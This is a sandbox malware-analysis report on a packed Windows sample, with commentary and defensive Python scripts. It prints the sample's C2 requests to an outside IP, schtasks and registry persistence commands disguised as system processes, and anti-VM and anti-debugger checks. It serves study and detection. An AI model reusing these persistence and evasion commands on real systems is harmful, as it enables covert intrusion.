RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77199ea5

exception.instruction_r: 39 09 e8 29 d5 58 6a 89 45 f4 8b 45 f4 8b e5 5d
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6c23608
registers.esp: 124251484
registers.edi: 124251604
registers.eax: 0
registers.ebp: 124251496
registers.edx: 51851444
registers.ebx: 49440004
registers.esi: 51570296
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x6c2352a
0x6c23d90
0x6c23ed6
0x6c23e61
0x59cd425
mscorlib+0x30c9ff @ 0x7124c9ff
mscorlib+0x302367 @ 0x71242367
mscorlib+0x3022a6 @ 0x712422a6
mscorlib+0x302261 @ 0x71242261
mscorlib+0x30ca7c @ 0x7124ca7c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73a22652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73a3264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73a32e95
DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x73ac07d8
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73a97d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73a97dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73a97e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73a2c3bf
DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x73ac0694
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73b3a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x750733ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77199ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77199ea5

exception.instruction_r: 39 09 e8 29 d5 58 6a 89 45 f4 8b 45 f4 8b e5 5d
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6c23608
registers.esp: 124247064
registers.edi: 124251604
registers.eax: 0
registers.ebp: 124247076
registers.edx: 51851988
registers.ebx: 49440004
registers.esi: 51570296
registers.ecx: 0
1 0 0
suspicious_features Connection to IP address suspicious_request GET http://62.109.1.30/triggers/vm_.php?OQmUWINaN1N6Ur43rwNkS1171bo7Lv=KuCD7w8UeNyz4A&e8f6de43394a8e2ef93b201a0d2ec922=c0280c4c3f572aabfa038560a3f515da&65ab24948c084368808c084126a043f5=wY3AzM2ITM5YWNmljN3UDO4YDN5gjYjljMhZTO3M2YmZTOilTY2cjN&OQmUWINaN1N6Ur43rwNkS1171bo7Lv=KuCD7w8UeNyz4A
request GET http://62.109.1.30/triggers/vm_.php?OQmUWINaN1N6Ur43rwNkS1171bo7Lv=KuCD7w8UeNyz4A&e8f6de43394a8e2ef93b201a0d2ec922=c0280c4c3f572aabfa038560a3f515da&65ab24948c084368808c084126a043f5=wY3AzM2ITM5YWNmljN3UDO4YDN5gjYjljMhZTO3M2YmZTOilTY2cjN&OQmUWINaN1N6Ur43rwNkS1171bo7Lv=KuCD7w8UeNyz4A
request GET https://ipinfo.io/json
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory (50 calls, listed in logged order; every call shares the same arguments and differs only in base_address)

process_identifier: 1604
process_handle: 0xffffffff (pseudo-handle for the current process)
length: 4096 (one page)
protection: 64 (PAGE_EXECUTE_READWRITE)
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
Status / Return / Repeated: 1 0 0 for every call

call  base_address
1     0x75073000
2     0x748ac000
3     0x75074000
4     0x748b1000
5     0x75074000
6     0x75074000
7     0x748b1000
8     0x75074000
9     0x7508c000
10    0x748b4000
11    0x7508a000
12    0x75071000
13    0x748ad000
14    0x75075000
15    0x748ac000
16    0x7508c000
17    0x75071000
18    0x748b1000
19    0x75073000
20    0x748ac000
21    0x76083000
22    0x75075000
23    0x75074000
24    0x748b0000
25    0x75071000
26    0x748b1000
27    0x75073000
28    0x748b1000
29    0x766bf000
30    0x766c8000
31    0x750ef000
32    0x75074000
33    0x748b8000
34    0x75071000
35    0x748b8000
36    0x7509c000
37    0x748b8000
38    0x75075000
39    0x748b8000
40    0x75071000
41    0x748ad000
42    0x75071000
43    0x748ad000
44    0x75075000
45    0x7508a000
46    0x75071000
47    0x748ab000
48    0x7508c000
49    0x748ab000
50    0x75071000

Only 18 distinct pages are touched, several of them repeatedly (0x75071000 eight times). All of them lie far above the sample's own image (which the exception record further down places at 0x10b0000), in the range where 32-bit Windows 7 maps its system DLLs, so this is single-page RWX toggling inside other modules rather than the sample unpacking its own sections.
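The list above is easier to reason about once it is aggregated. The following script is an added example, not part of the sandbox report: it takes the 50 base addresses in logged order, collapses them per page, and classifies each page as inside or outside the sample's own image. The image range is an assumption derived from the exception record (0x1682814 minus offset 0x5d2814 gives a base of 0x10b0000) and from the section table (the last section ends at RVA 0x937e00); the classification labels and the helper names are mine.

```python
"""Aggregate the NtProtectVirtualMemory calls logged above: every call flips one
4096-byte page to PAGE_EXECUTE_READWRITE in the sample's own process.
Added example, not part of the sandbox report. RWX_CALLS is copied from the
report in logged order; MAIN_IMAGE_* is an assumption about this run's layout
(base from the exception record, size from the section table)."""
from collections import Counter

PAGE_EXECUTE_READWRITE = 0x40
PAGE_SIZE = 0x1000

# Constructed from the report: base_address of each of the 50 calls, in order.
RWX_CALLS = [
    0x75073000, 0x748ac000, 0x75074000, 0x748b1000, 0x75074000,
    0x75074000, 0x748b1000, 0x75074000, 0x7508c000, 0x748b4000,
    0x7508a000, 0x75071000, 0x748ad000, 0x75075000, 0x748ac000,
    0x7508c000, 0x75071000, 0x748b1000, 0x75073000, 0x748ac000,
    0x76083000, 0x75075000, 0x75074000, 0x748b0000, 0x75071000,
    0x748b1000, 0x75073000, 0x748b1000, 0x766bf000, 0x766c8000,
    0x750ef000, 0x75074000, 0x748b8000, 0x75071000, 0x748b8000,
    0x7509c000, 0x748b8000, 0x75075000, 0x748b8000, 0x75071000,
    0x748ad000, 0x75071000, 0x748ad000, 0x75075000, 0x7508a000,
    0x75071000, 0x748ab000, 0x7508c000, 0x748ab000, 0x75071000,
]

# Assumption: Desktop.exe image range for this run (see docstring).
MAIN_IMAGE_BASE = 0x10B0000
MAIN_IMAGE_END = MAIN_IMAGE_BASE + 0x937E00


def classify_page(addr, image=(MAIN_IMAGE_BASE, MAIN_IMAGE_END)):
    """'main_image' if the page belongs to the sample's own mapped image
    (self-modification / unpacking), else 'other_module' (code or data of
    some other loaded module, which is what hooking and patching touch)."""
    lo, hi = image
    return "main_image" if lo <= addr < hi else "other_module"


def summarize_rwx(calls, image=(MAIN_IMAGE_BASE, MAIN_IMAGE_END)):
    """Collapse a list of RWX re-protections into per-page statistics."""
    per_page = Counter(a & ~(PAGE_SIZE - 1) for a in calls)
    pages_by_class = Counter(classify_page(p, image) for p in per_page)
    # Pages re-protected more than once: the code keeps flipping them
    # (write, restore, write again), the signature of in-place patching.
    repeat_pages = sorted((p for p, n in per_page.items() if n > 1),
                          key=lambda p: (-per_page[p], p))
    return {
        "calls": len(calls),
        "unique_pages": len(per_page),
        "per_page": per_page,
        "pages_by_class": pages_by_class,
        "most_toggled": per_page.most_common(1)[0],
        "repeat_pages": repeat_pages,
    }


if __name__ == "__main__":
    s = summarize_rwx(RWX_CALLS)
    print("%d calls over %d pages, %s" % (s["calls"], s["unique_pages"], dict(s["pages_by_class"])))
    for p in s["repeat_pages"]:
        print("  0x%08x re-protected %d times" % (p, s["per_page"][p]))
```

Run stand-alone it reports 50 calls over 18 pages, all classified other_module, with 11 pages touched more than once. The practical reading: a packer unpacking itself would touch its own image or a fresh allocation, whereas repeated single-page RWX flips on other modules' pages is what inline hooking or patching of loaded DLLs looks like, which agrees with the win_hook match in the signature list further down.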
description lsm.exe tried to sleep 318 seconds, actually delayed analysis time by 318 seconds
domain ipinfo.io
file C:\Documents and Settings\WmiPrvSE.exe
file C:\PerfLogs\Admin\winlogon.exe
file C:\Windows\System32\nlsbres\csrss.exe
file C:\Windows\System32\PhotoScreensaver\conhost.exe
file C:\Python27\libs\lsm.exe
file C:\Users\test22\AppData\Local\Temp\wpC7TVl2rc.bat
file C:\Windows\System32\NlsLexicons004c\taskhost.exe
file C:\Python27\Scripts\IMEDICTUPDATE.exe
cmdline "schtasks" /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\System32\nlsbres\csrss.exe'" /rl HIGHEST /f
cmdline "schtasks" /create /tn "lsm" /sc ONLOGON /tr "'C:\Python27\libs\lsm.exe'" /rl HIGHEST /f
cmdline "schtasks" /create /tn "IMEDICTUPDATE" /sc ONLOGON /tr "'C:\Python27\Scripts\IMEDICTUPDATE.exe'" /rl HIGHEST /f
cmdline "schtasks" /create /tn "taskhost" /sc ONLOGON /tr "'C:\Windows\System32\NlsLexicons004c\taskhost.exe'" /rl HIGHEST /f
cmdline "C:\Windows\System32\cmd.exe" /C "C:\Users\test22\AppData\Local\Temp\wpC7TVl2rc.bat"
cmdline "schtasks" /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\System32\PhotoScreensaver\conhost.exe'" /rl HIGHEST /f
cmdline "schtasks" /create /tn "winlogon" /sc ONLOGON /tr "'C:\PerfLogs\Admin\winlogon.exe'" /rl HIGHEST /f
cmdline "schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Documents and Settings\WmiPrvSE.exe'" /rl HIGHEST /f
file C:\Users\test22\AppData\Local\Temp\wpC7TVl2rc.bat
Time & API Arguments Status Return Repeated

CreateProcessInternalW (7 calls; shared arguments: current_directory C:\Users\test22\AppData\Local\Temp, filepath and filepath_r empty, track 1, creation_flags 134217728 (CREATE_NO_WINDOW), inherit_handles 1, stack_pivoted 0; Status / Return / Repeated 1 1 0 for each)

pid   tid   process_handle  thread_handle  command_line
2292  2296  0x0000038c      0x00000388     "schtasks" /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\System32\PhotoScreensaver\conhost.exe'" /rl HIGHEST /f
2352  2356  0x0000039c      0x00000390     "schtasks" /create /tn "IMEDICTUPDATE" /sc ONLOGON /tr "'C:\Python27\Scripts\IMEDICTUPDATE.exe'" /rl HIGHEST /f
2412  2416  0x000003a4      0x00000398     "schtasks" /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\System32\nlsbres\csrss.exe'" /rl HIGHEST /f
2540  2544  0x000003a8      0x000003ac     "schtasks" /create /tn "winlogon" /sc ONLOGON /tr "'C:\PerfLogs\Admin\winlogon.exe'" /rl HIGHEST /f
2600  2604  0x000003b0      0x000003b4     "schtasks" /create /tn "lsm" /sc ONLOGON /tr "'C:\Python27\libs\lsm.exe'" /rl HIGHEST /f
2660  2664  0x000003b8      0x000003bc     "schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Documents and Settings\WmiPrvSE.exe'" /rl HIGHEST /f
2768  2772  0x000003cc      0x000003c8     "schtasks" /create /tn "taskhost" /sc ONLOGON /tr "'C:\Windows\System32\NlsLexicons004c\taskhost.exe'" /rl HIGHEST /f

ShellExecuteExW (the dropped batch file is launched hidden)

show_type: 0 (SW_HIDE)
filepath_r: C:\Users\test22\AppData\Local\Temp\wpC7TVl2rc.bat
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\wpC7TVl2rc.bat
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15 (GAA_FLAG_SKIP_UNICAST | GAA_FLAG_SKIP_ANYCAST | GAA_FLAG_SKIP_MULTICAST | GAA_FLAG_SKIP_DNS_SERVER: adapter descriptors only, which still carry each adapter's physical address)
family: 0 (AF_UNSPEC)
111 0 (111 = ERROR_BUFFER_OVERFLOW, the size-probing first call that precedes the real query)
PE sections with high entropy (8.0 is the maximum for byte data, so all four are packed or encrypted):

name            virtual_address  virtual_size  size_of_data  entropy
(single space)  0x00002000       0x00116000    0x0009808f    7.9828
(single space)  0x00118000       0x0000520f    0x00002428    7.8491
(single space)  0x0011e000       0x000005bd    0x000002ac    7.6875
.boot           0x0063a000       0x002fde00    0x002fdd04    7.9573

description A section with a high entropy has been found (raised for each of the four sections)
entropy 0.999453269235 description Overall entropy of this PE file is high (normalised value, 1.0 = maximum)

Blank-named sections followed by a large .boot section is the layout Themida/WinLicense produces, which matches the packer identification in the summary.
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description Communication using DGA rule Network_DGA
description Communications use DNS rule Network_DNS
description Communications over RAW Socket rule Network_TCP_Socket
description Create a windows service rule Create_Service
description Record Audio rule Sniff_Audio
description Escalate privileges rule Escalate_priviledges
description Run a KeyLogger rule KeyLogger
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description Communications over HTTP rule Network_HTTP
description Match Windows Inet API call rule Str_Win32_Internet_API
description Communications over FTP rule Network_FTP
description Take ScreenShot rule ScreenShot
description Match Windows Http API call rule Str_Win32_Http_API
description Steal credential rule local_credential_Steal
description File Downloader rule Network_Downloader
description Communications over P2P network rule Network_P2P_Win
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Possibly employs anti-virtualization techniques rule vmdetect
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
cmdline "schtasks" /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\System32\nlsbres\csrss.exe'" /rl HIGHEST /f
cmdline "schtasks" /create /tn "lsm" /sc ONLOGON /tr "'C:\Python27\libs\lsm.exe'" /rl HIGHEST /f
cmdline chcp 65001
cmdline "schtasks" /create /tn "IMEDICTUPDATE" /sc ONLOGON /tr "'C:\Python27\Scripts\IMEDICTUPDATE.exe'" /rl HIGHEST /f
cmdline "schtasks" /create /tn "taskhost" /sc ONLOGON /tr "'C:\Windows\System32\NlsLexicons004c\taskhost.exe'" /rl HIGHEST /f
cmdline "schtasks" /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\System32\PhotoScreensaver\conhost.exe'" /rl HIGHEST /f
cmdline ping -n 5 localhost
cmdline "schtasks" /create /tn "winlogon" /sc ONLOGON /tr "'C:\PerfLogs\Admin\winlogon.exe'" /rl HIGHEST /f
cmdline "schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Documents and Settings\WmiPrvSE.exe'" /rl HIGHEST /f
host 62.109.1.30
Time & API Arguments Status Return Repeated

FindWindowA (50 calls; window_name is empty in every call, and every call returned 0, i.e. no window with that class was found)

Sequence as logged:
calls 1-9:    FilemonClass, FilemonClass, File Monitor - Sysinternals: www.sysinternals.com, PROCMON_WINDOW_CLASS, Process Monitor - Sysinternals: www.sysinternals.com, RegmonClass, RegmonClass, Registry Monitor - Sysinternals: www.sysinternals.com, 18467-41
calls 10-27:  three repetitions of: Regmonclass, Regmonclass, 18467-41, Filemonclass, Filemonclass, PROCMON_WINDOW_CLASS
calls 28-36:  the same nine strings as calls 1-9
calls 37-48:  two repetitions of the same six strings as calls 10-15
calls 49-50:  Regmonclass, Regmonclass

Totals per class_name:
Regmonclass 12, Filemonclass 10, PROCMON_WINDOW_CLASS 7, 18467-41 7, FilemonClass 4, RegmonClass 4, File Monitor - Sysinternals: www.sysinternals.com 2, Process Monitor - Sysinternals: www.sysinternals.com 2, Registry Monitor - Sysinternals: www.sysinternals.com 2

These strings are the window classes and titles of the Sysinternals Filemon, Regmon and Process Monitor tools; probing for them is the classic "is a monitoring tool running" check, repeated here in two rounds.
registry HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
registry HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion
(both values hold the firmware identification strings, where hypervisor product names such as VBOX, VMWARE or QEMU appear on a virtual machine; reading them is a standard VM fingerprint)
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell reg_value explorer.exe, "C:\Windows\System32\PhotoScreensaver\conhost.exe"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\conhost reg_value "C:\Windows\System32\PhotoScreensaver\conhost.exe"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\conhost reg_value "C:\Windows\System32\PhotoScreensaver\conhost.exe"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell reg_value explorer.exe, "C:\Windows\System32\PhotoScreensaver\conhost.exe", "C:\Python27\Scripts\IMEDICTUPDATE.exe"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\IMEDICTUPDATE reg_value "C:\Python27\Scripts\IMEDICTUPDATE.exe"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\IMEDICTUPDATE reg_value "C:\Python27\Scripts\IMEDICTUPDATE.exe"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell reg_value explorer.exe, "C:\Windows\System32\PhotoScreensaver\conhost.exe", "C:\Python27\Scripts\IMEDICTUPDATE.exe", "C:\Windows\System32\nlsbres\csrss.exe"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\csrss reg_value "C:\Windows\System32\nlsbres\csrss.exe"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\csrss reg_value "C:\Windows\System32\nlsbres\csrss.exe"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell reg_value explorer.exe, "C:\Windows\System32\PhotoScreensaver\conhost.exe", "C:\Python27\Scripts\IMEDICTUPDATE.exe", "C:\Windows\System32\nlsbres\csrss.exe", "C:\PerfLogs\Admin\winlogon.exe"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\winlogon reg_value "C:\PerfLogs\Admin\winlogon.exe"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\winlogon reg_value "C:\PerfLogs\Admin\winlogon.exe"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell reg_value explorer.exe, "C:\Windows\System32\PhotoScreensaver\conhost.exe", "C:\Python27\Scripts\IMEDICTUPDATE.exe", "C:\Windows\System32\nlsbres\csrss.exe", "C:\PerfLogs\Admin\winlogon.exe", "C:\Python27\libs\lsm.exe"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\lsm reg_value "C:\Python27\libs\lsm.exe"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\lsm reg_value "C:\Python27\libs\lsm.exe"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell reg_value explorer.exe, "C:\Windows\System32\PhotoScreensaver\conhost.exe", "C:\Python27\Scripts\IMEDICTUPDATE.exe", "C:\Windows\System32\nlsbres\csrss.exe", "C:\PerfLogs\Admin\winlogon.exe", "C:\Python27\libs\lsm.exe", "C:\Documents and Settings\WmiPrvSE.exe"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE reg_value "C:\Documents and Settings\WmiPrvSE.exe"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE reg_value "C:\Documents and Settings\WmiPrvSE.exe"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell reg_value explorer.exe, "C:\Windows\System32\PhotoScreensaver\conhost.exe", "C:\Python27\Scripts\IMEDICTUPDATE.exe", "C:\Windows\System32\nlsbres\csrss.exe", "C:\PerfLogs\Admin\winlogon.exe", "C:\Python27\libs\lsm.exe", "C:\Documents and Settings\WmiPrvSE.exe", "C:\Windows\System32\NlsLexicons004c\taskhost.exe"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\taskhost reg_value "C:\Windows\System32\NlsLexicons004c\taskhost.exe"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\taskhost reg_value "C:\Windows\System32\NlsLexicons004c\taskhost.exe"
cmdline "schtasks" /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\System32\nlsbres\csrss.exe'" /rl HIGHEST /f
cmdline "schtasks" /create /tn "lsm" /sc ONLOGON /tr "'C:\Python27\libs\lsm.exe'" /rl HIGHEST /f
cmdline "schtasks" /create /tn "IMEDICTUPDATE" /sc ONLOGON /tr "'C:\Python27\Scripts\IMEDICTUPDATE.exe'" /rl HIGHEST /f
cmdline "schtasks" /create /tn "taskhost" /sc ONLOGON /tr "'C:\Windows\System32\NlsLexicons004c\taskhost.exe'" /rl HIGHEST /f
cmdline "schtasks" /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\System32\PhotoScreensaver\conhost.exe'" /rl HIGHEST /f
cmdline "schtasks" /create /tn "winlogon" /sc ONLOGON /tr "'C:\PerfLogs\Admin\winlogon.exe'" /rl HIGHEST /f
cmdline "schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Documents and Settings\WmiPrvSE.exe'" /rl HIGHEST /f
file C:\PerfLogs\Admin\winlogon.exe:Zone.Identifier
file C:\Documents and Settings\WmiPrvSE.exe:Zone.Identifier
file C:\Windows\System32\PhotoScreensaver\conhost.exe:Zone.Identifier
file C:\Windows\System32\nlsbres\csrss.exe:Zone.Identifier
file C:\Windows\System32\NlsLexicons004c\taskhost.exe:Zone.Identifier
file C:\Python27\libs\lsm.exe:Zone.Identifier
file C:\Python27\Scripts\IMEDICTUPDATE.exe:Zone.Identifier
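The persistence rows above follow one pattern: seven copies named after Windows system processes, each dropped outside the directory the real process lives in, each registered three ways (an ONLOGON scheduled task with /rl HIGHEST, a Run key in both hives, and an entry appended to the Winlogon Shell value). The script below is an added example of detection logic for that pattern; it is not part of the sandbox report. Its sample events are constructed from the report's own cmdline and reg_key rows, the list of legitimate directories is a deliberately minimal assumption about a default install, and the function and technique names are mine.

```python
"""Detection logic for the persistence chain recorded above: scheduled tasks
(ONLOGON, /rl HIGHEST), matching Run keys, and a Winlogon Shell value that has
grown from "explorer.exe" into a comma-separated list of payloads.
Added example, not part of the sandbox report. SAMPLE_EVENTS is constructed
from the report's cmdline / reg_key rows; LEGIT_DIRS is an assumption."""
import ntpath

# Process names the dropper borrows (all of them appear in the report).
SYSTEM_PROCESS_NAMES = {"csrss", "winlogon", "lsm", "conhost", "taskhost", "wmiprvse"}

# Assumption: directories where those binaries legitimately live. Compared as
# whole directories, not prefixes, so a subdirectory of System32 is NOT accepted.
LEGIT_DIRS = {
    r"c:\windows\system32",
    r"c:\windows\syswow64",
    r"c:\windows\system32\wbem",
    r"c:\windows\syswow64\wbem",
}

SAMPLE_EVENTS = [  # constructed from the report
    ("cmdline", r'''"schtasks" /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\System32\nlsbres\csrss.exe'" /rl HIGHEST /f'''),
    ("cmdline", r'''"schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Documents and Settings\WmiPrvSE.exe'" /rl HIGHEST /f'''),
    ("cmdline", r'''"schtasks" /create /tn "IMEDICTUPDATE" /sc ONLOGON /tr "'C:\Python27\Scripts\IMEDICTUPDATE.exe'" /rl HIGHEST /f'''),
    ("reg_key", r"HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell",
     r'explorer.exe, "C:\Windows\System32\PhotoScreensaver\conhost.exe", "C:\Python27\Scripts\IMEDICTUPDATE.exe", '
     r'"C:\Windows\System32\nlsbres\csrss.exe", "C:\PerfLogs\Admin\winlogon.exe", "C:\Python27\libs\lsm.exe", '
     r'"C:\Documents and Settings\WmiPrvSE.exe", "C:\Windows\System32\NlsLexicons004c\taskhost.exe"'),
    ("reg_key", r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\conhost",
     r'"C:\Windows\System32\PhotoScreensaver\conhost.exe"'),
    ("reg_key", r"HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\IMEDICTUPDATE",
     r'"C:\Python27\Scripts\IMEDICTUPDATE.exe"'),
]


def _tokenize(cmdline):
    """Split on whitespace while honouring double quotes (which are dropped)."""
    tokens, cur, quoted = [], [], False
    for ch in cmdline:
        if ch == '"':
            quoted = not quoted
        elif ch.isspace() and not quoted:
            if cur:
                tokens.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        tokens.append("".join(cur))
    return tokens


def parse_schtasks(cmdline):
    """Return {task, trigger, path, runlevel} for a 'schtasks /create' line, else None."""
    toks = _tokenize(cmdline)
    if not toks or toks[0].lower() != "schtasks" or "/create" not in [t.lower() for t in toks]:
        return None
    opts = {}
    for i, tok in enumerate(toks):
        if tok.startswith("/") and i + 1 < len(toks) and not toks[i + 1].startswith("/"):
            opts[tok[1:].lower()] = toks[i + 1].strip("'")  # the /tr value is wrapped in '...'
    return {"task": opts.get("tn"), "trigger": opts.get("sc"),
            "path": opts.get("tr"), "runlevel": opts.get("rl")}


def is_masquerade(path):
    """True when a system-process name is used from a non-system directory."""
    directory, filename = ntpath.split(path)
    stem = ntpath.splitext(filename)[0].lower()
    return stem in SYSTEM_PROCESS_NAMES and directory.lower() not in LEGIT_DIRS


def extra_shell_entries(value):
    """Everything in a Winlogon Shell value besides the default explorer.exe."""
    entries = [e.strip().strip('"') for e in value.split(",")]
    return [e for e in entries if e and e.lower() != "explorer.exe"]


def analyze(events):
    """Walk (kind, ...) event tuples and return a list of findings."""
    findings = []
    for ev in events:
        if ev[0] == "cmdline":
            task = parse_schtasks(ev[1])
            if task and task["path"] and is_masquerade(task["path"]):
                findings.append({"technique": "schtasks_onlogon_masquerade",
                                 "detail": "%s -> %s (%s, %s)" % (task["task"], task["path"],
                                                                 task["trigger"], task["runlevel"])})
        elif ev[0] == "reg_key":
            key, value = ev[1].lower(), ev[2]
            if key.endswith(r"\winlogon\shell"):
                for extra in extra_shell_entries(value):  # any extra entry is a logon hijack
                    findings.append({"technique": "winlogon_shell_extra", "detail": extra})
            elif "\\currentversion\\run\\" in key:
                path = value.strip().strip('"')
                if is_masquerade(path):
                    findings.append({"technique": "run_key_masquerade", "detail": path})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f["technique"], f["detail"])
```

Two design points matter. The directory test is an exact match rather than a prefix match, because the report shows drops in subdirectories of System32 (nlsbres, PhotoScreensaver, NlsLexicons004c) that a prefix check would accept. And the Winlogon Shell check flags every entry beyond explorer.exe regardless of name, which is how IMEDICTUPDATE.exe (a name that no masquerade list would catch) still surfaces.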
Process injection Process 2840 resumed a thread in remote process 3020
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000084
suspend_count: 0
process_identifier: 3020
1 0 0
Time & API Arguments Status Return Repeated

NtQuerySystemInformation

information_class: 76 (SystemFirmwareTableInformation)
3221225507 0 (3221225507 = 0xc0000023, STATUS_BUFFER_TOO_SMALL: the sizing call that precedes reading the raw SMBIOS/ACPI firmware tables, another place where hypervisor vendor strings turn up)
Time & API Arguments Status Return Repeated

__exception__

stacktrace: (empty)
exception.instruction_r: ed e9 ae 84 02 00 77 00 a6 31 d6 b4 fd ff 50 00 (0xed is the opcode of IN EAX, DX)
exception.symbol: desktop+0x5d2814
exception.instruction: in eax, dx
exception.module: Desktop.exe
exception.exception_code: 0xc0000096 (STATUS_PRIVILEGED_INSTRUCTION)
exception.offset: 6105108 (0x5d2814)
exception.address: 0x1682814 (so the module is loaded at 0x10b0000)
registers.esp: 3997396
registers.edi: 20920013
registers.eax: 1447909480 (0x564d5868, "VMXh": the VMware backdoor magic)
registers.ebp: 18702336
registers.edx: 22104 (0x5658, "VX": the VMware backdoor I/O port)
registers.ebx: 2256917605
registers.esi: 20575618
registers.ecx: 10 (0x0a, backdoor command GETVERSION)
1 0 0

This is the VMware backdoor probe: eax = "VMXh", dx = 0x5658, ecx = GETVERSION, then IN EAX, DX. On a VMware guest the hypervisor intercepts the port access from any privilege level and returns without a fault; anywhere else the user-mode IN raises the privileged-instruction exception recorded here, which the sample catches with an exception handler and reads as "not VMware".
